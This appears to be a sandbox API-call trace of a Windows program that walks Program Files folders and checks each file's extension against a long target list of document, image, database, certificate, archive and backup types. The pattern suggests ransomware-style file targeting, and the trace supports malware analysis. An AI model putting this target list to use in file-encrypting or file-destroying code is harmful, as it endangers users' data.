	[0043.562] FindNextFileW (in: hFindFile=0xb430248, lpFindFileData=0xa91f58c | out: lpFindFileData=0xa91f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe421d16, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe874c0b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xe421d16, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x7e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msoeres.dll.mui", cAlternateFileName="")) returned 1
	[0043.562] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0043.562] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1
	[0043.563] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1
	[0043.563] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1
	[0043.563] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1
	[0043.563] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0043.563] lstrcmpiW (lpString1=".accda", lpString2="ll.mui") returned -1
	[0043.563] lstrcmpiW (lpString1=".accdb", lpString2="ll.mui") returned -1
	[0043.563] lstrcmpiW (lpString1=".accdc", lpString2="ll.mui") returned -1
	[0043.563] lstrcmpiW (lpString1=".accde", lpString2="ll.mui") returned -1
	[0043.563] lstrcmpiW (lpString1=".accdt", lpString2="ll.mui") returned -1
	[0043.563] lstrcmpiW (lpString1=".accdw", lpString2="ll.mui") returned -1
	[0043.563] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1
	[0043.563] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1
	[0043.563] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1
	[0043.563] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1
	[0043.563] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1
	[0043.563] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1
	[0043.563] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1
	[0043.563] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1
	[0043.563] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1
	[0043.563] lstrcmpiW (lpString1=".anim", lpString2="l.mui") returned -1
	[0043.564] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1
	[0043.564] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1
	[0043.564] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1
	[0043.564] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1
	[0043.564] lstrcmpiW (lpString1=".ascx", lpString2="l.mui") returned -1
	[0043.564] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1
	[0043.564] lstrcmpiW (lpString1=".asmx", lpString2="l.mui") returned -1
	[0043.564] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1
	[0043.564] lstrcmpiW (lpString1=".aspx", lpString2="l.mui") returned -1
	[0043.564] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1
	[0043.564] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1
	[0043.564] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1
	[0043.564] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1
	[0043.564] lstrcmpiW (lpString1=".backup", lpString2="dll.mui") returned -1
	[0043.564] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1
	[0043.564] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1
	[0043.564] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1
	[0043.564] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1
	[0043.564] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1
	[0043.564] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0043.565] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1
	[0043.565] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1
	[0043.565] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1
	[0043.565] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1
	[0043.565] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1
	[0043.565] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1
	[0043.565] lstrcmpiW (lpString1=".cfml", lpString2="l.mui") returned -1
	[0043.565] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1
	[0043.565] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1
	[0043.565] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1
	[0043.565] lstrcmpiW (lpString1=".class", lpString2="ll.mui") returned -1
	[0043.565] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1
	[0043.565] lstrcmpiW (lpString1=".config", lpString2="dll.mui") returned -1
	[0043.565] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1
	[0043.565] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1
	[0043.565] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1
	[0043.565] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1
	[0043.565] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1
	[0043.565] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1
	[0043.565] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1
	[0043.566] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1
	[0043.566] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1
	[0043.566] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1
	[0043.566] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1
	[0043.566] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0043.566] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1
	[0043.566] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1
	[0043.566] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1
	[0043.566] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1
	[0043.566] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1
	[0043.566] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1
	[0043.566] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1
	[0043.566] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1
	[0043.566] lstrcmpiW (lpString1=".divx", lpString2="l.mui") returned -1
	[0043.566] lstrcmpiW (lpString1=".djvu", lpString2="l.mui") returned -1
	[0043.566] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1
	[0043.566] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0043.566] lstrcmpiW (lpString1=".docm", lpString2="l.mui") returned -1
	[0043.566] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1
	[0043.567] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1
	[0043.567] lstrcmpiW (lpString1=".dotm", lpString2="l.mui") returned -1
	[0043.567] lstrcmpiW (lpString1=".dotx", lpString2="l.mui") returned -1
	[0043.567] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1
	[0043.567] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1
	[0043.567] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1
	[0043.567] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1
	[0043.567] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1
	[0043.567] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1
	[0043.567] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1
	[0043.567] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1
	[0043.567] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1
	[0043.567] lstrcmpiW (lpString1=".edml", lpString2="l.mui") returned -1
	[0043.567] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1
	[0043.567] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1
	[0043.567] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1
	[0043.567] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1
	[0043.567] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1
	[0043.567] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1
	[0043.567] lstrcmpiW (lpString1=".epsf", lpString2="l.mui") returned -1
	[0043.568] lstrcmpiW (lpString1=".epsp", lpString2="l.mui") returned -1
	[0043.568] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1
	[0043.568] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1
	[0043.568] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1
	[0043.568] lstrcmpiW (lpString1=".fido", lpString2="l.mui") returned -1
	[0043.568] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1
	[0043.568] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1
	[0043.568] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1
	[0043.568] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1
	[0043.568] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1
	[0043.568] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1
	[0043.568] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1
	[0043.568] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1
	[0043.568] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1
	[0043.568] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1
	[0043.568] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1
	[0043.568] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1
	[0043.568] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1
	[0043.568] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1
	[0043.568] lstrcmpiW (lpString1=".html", lpString2="l.mui") returned -1
	[0043.569] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1
	[0043.569] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1
	[0043.569] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1
	[0043.569] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1
	[0043.569] lstrcmpiW (lpString1=".indd", lpString2="l.mui") returned -1
	[0043.569] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1
	[0043.569] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1
	[0043.569] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1
	[0043.569] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1
	[0043.569] lstrcmpiW (lpString1=".java", lpString2="l.mui") returned -1
	[0043.569] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1
	[0043.569] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1
	[0043.569] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1
	[0043.569] lstrcmpiW (lpString1=".jpeg", lpString2="l.mui") returned -1
	[0043.569] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1
	[0043.569] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0043.569] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1
	[0043.569] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1
	[0043.569] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1
	[0043.569] lstrcmpiW (lpString1=".json", lpString2="l.mui") returned -1
	[0043.570] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1
	[0043.570] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1
	[0043.570] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1
	[0043.570] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1
	[0043.570] lstrcmpiW (lpString1=".lasso", lpString2="ll.mui") returned -1
	[0043.570] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1
	[0043.570] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1
	[0043.570] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1
	[0043.570] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1
	[0043.570] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1
	[0043.570] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1
	[0043.570] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1
	[0043.570] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1
	[0043.570] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1
	[0043.570] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1
	[0043.570] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1
	[0043.570] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1
	[0043.570] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1
	[0043.570] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1
	[0043.571] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1
	[0043.571] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1
	[0043.571] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1
	[0043.571] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1
	[0043.571] lstrcmpiW (lpString1=".mhtml", lpString2="ll.mui") returned -1
	[0043.571] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1
	[0043.571] lstrcmpiW (lpString1=".mkidx", lpString2="ll.mui") returned -1
	[0043.571] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1
	[0043.571] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1
	[0043.571] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1
	[0043.571] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1
	[0043.571] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1
	[0043.571] lstrcmpiW (lpString1=".mpeg", lpString2="l.mui") returned -1
	[0043.571] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1
	[0043.571] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1
	[0043.571] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1
	[0043.571] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1
	[0043.571] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1
	[0043.571] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1
	[0043.571] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1
	[0043.572] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1
	[0043.572] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1
	[0043.572] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1
	[0043.572] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1
	[0043.572] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1
	[0043.572] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1
	[0043.572] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1
	[0043.572] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1
	[0043.572] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1
	[0043.572] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1
	[0043.572] lstrcmpiW (lpString1=".onepkg", lpString2="dll.mui") returned -1
	[0043.572] lstrcmpiW (lpString1=".onetoc2", lpString2=".dll.mui") returned 1
	[0043.572] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1
	[0043.572] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1
	[0043.572] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1
	[0043.572] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1
	[0043.572] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1
	[0043.572] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1
	[0043.572] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1
	[0043.572] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1
	[0043.573] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1
	[0043.573] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1
	[0043.573] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1
	[0043.573] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0043.573] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1
	[0043.573] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1
	[0043.573] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1
	[0043.573] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1
	[0043.573] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1
	[0043.573] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1
	[0043.573] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1
	[0043.573] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1
	[0043.573] lstrcmpiW (lpString1=".php3", lpString2="l.mui") returned -1
	[0043.573] lstrcmpiW (lpString1=".php4", lpString2="l.mui") returned -1
	[0043.573] lstrcmpiW (lpString1=".php5", lpString2="l.mui") returned -1
	[0043.573] lstrcmpiW (lpString1=".phtml", lpString2="ll.mui") returned -1
	[0043.573] lstrcmpiW (lpString1=".pict", lpString2="l.mui") returned -1
	[0043.573] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1
	[0043.573] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1
	[0043.574] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1
	[0043.574] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1
	[0043.574] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1
	[0043.574] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1
	[0043.574] lstrcmpiW (lpString1=".potm", lpString2="l.mui") returned -1
	[0043.574] lstrcmpiW (lpString1=".potx", lpString2="l.mui") returned -1
	[0043.574] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1
	[0043.574] lstrcmpiW (lpString1=".ppam", lpString2="l.mui") returned -1
	[0043.574] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1
	[0043.574] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1
	[0043.574] lstrcmpiW (lpString1=".ppsm", lpString2="l.mui") returned -1
	[0043.574] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0043.574] lstrcmpiW (lpString1=".pptm", lpString2="l.mui") returned -1
	[0043.574] lstrcmpiW (lpString1=".pptx", lpString2="l.mui") returned -1
	[0043.574] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1
	[0043.574] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1
	[0043.574] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1
	[0043.574] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1
	[0043.574] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1
	[0043.574] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1
	[0043.575] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1
	[0043.575] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1
	[0043.575] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1
	[0043.575] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1
	[0043.575] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1
	[0043.575] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1
	[0043.575] lstrcmpiW (lpString1=".raf", lpString2=".mui") returned 1
	[0043.575] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0043.575] FindNextFileW (in: hFindFile=0xb430248, lpFindFileData=0xa91f58c | out: lpFindFileData=0xa91f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcd37ad, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe067905, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xdcd37ad, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="WinMail.exe.mui", cAlternateFileName="")) returned 1
	[0043.575] FindClose (in: hFindFile=0xb430248 | out: hFindFile=0xb430248) returned 1
	[0043.575] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4db740 | out: hHeap=0x7d60000) returned 1
	[0043.575] FindNextFileW (in: hFindFile=0xb430148, lpFindFileData=0xa91f808 | out: lpFindFileData=0xa91f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7065be1, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa7065be1, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa70b1ea1, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1fbe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msoe.dll", cAlternateFileName="")) returned 1
	[0043.575] lstrlenW (lpString="msoe.dll") returned 8
	[0043.575] lstrlenW (lpString=".1cd") returned 4
	[0043.576] FindClose (in: hFindFile=0xb430148 | out: hFindFile=0xb430148) returned 1
	[0043.576] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb3f0050 | out: hHeap=0x7d60000) returned 1
	[0043.576] FindNextFileW (in: hFindFile=0xb430088, lpFindFileData=0xa91fa84 | out: lpFindFileData=0xa91fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe6135e40, ftLastAccessTime.dwHighDateTime=0x1d58eed, ftLastWriteTime.dwLowDateTime=0xe6135e40, ftLastWriteTime.dwHighDateTime=0x1d58eed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1
	[0043.576] lstrlenW (lpString="C:\\Program Files\\Windows Media Player") returned 37
	[0043.576] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Media Player\\*", lpFindFileData=0xa91f808 | out: lpFindFileData=0xa91f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe6135e40, ftLastAccessTime.dwHighDateTime=0x1d58eed, ftLastWriteTime.dwLowDateTime=0xe6135e40, ftLastWriteTime.dwHighDateTime=0x1d58eed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb430148
	[0043.576] FindNextFileW (in: hFindFile=0xb430148, lpFindFileData=0xa91f808 | out: lpFindFileData=0xa91f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe6135e40, ftLastAccessTime.dwHighDateTime=0x1d58eed, ftLastWriteTime.dwLowDateTime=0xe6135e40, ftLastWriteTime.dwHighDateTime=0x1d58eed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0043.576] FindNextFileW (in: hFindFile=0xb430148, lpFindFileData=0xa91f808 | out: lpFindFileData=0xa91f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21ccca7f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1
	[0043.577] lstrlenW (lpString="C:\\Program Files\\Windows Media Player\\en-US") returned 43
	[0043.577] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Media Player\\en-US\\*", lpFindFileData=0xa91f58c | out: lpFindFileData=0xa91f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21ccca7f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb430308
	[0043.579] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xa91f58c | out: lpFindFileData=0xa91f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21ccca7f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0043.579] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xa91f58c | out: lpFindFileData=0xa91f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdc7162, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfdc7162, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mpvis.dll.mui", cAlternateFileName="")) returned 1
	[0043.579] lstrlenW (lpString="mpvis.dll.mui") returned 13
	[0043.579] lstrlenW (lpString=".1cd") returned 4
	[0043.579] FindClose (in: hFindFile=0xb430308 | out: hFindFile=0xb430308) returned 1
	[0043.580] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4db740 | out: hHeap=0x7d60000) returned 1
	[0043.581] FindNextFileW (in: hFindFile=0xb430148, lpFindFileData=0xa91f808 | out: lpFindFileData=0xa91f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Icons", cAlternateFileName="")) returned 1
	[0043.581] lstrlenW (lpString="C:\\Program Files\\Windows Media Player\\Icons") returned 43
	[0043.581] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Media Player\\Icons\\*", lpFindFileData=0xa91f58c | out: lpFindFileData=0xa91f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb430308
	[0043.581] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xa91f58c | out: lpFindFileData=0xa91f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0043.581] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xa91f58c | out: lpFindFileData=0xa91f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0043.581] FindClose (in: hFindFile=0xb430308 | out: hFindFile=0xb430308) returned 1
	[0043.581] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb420068 | out: hHeap=0x7d60000) returned 1
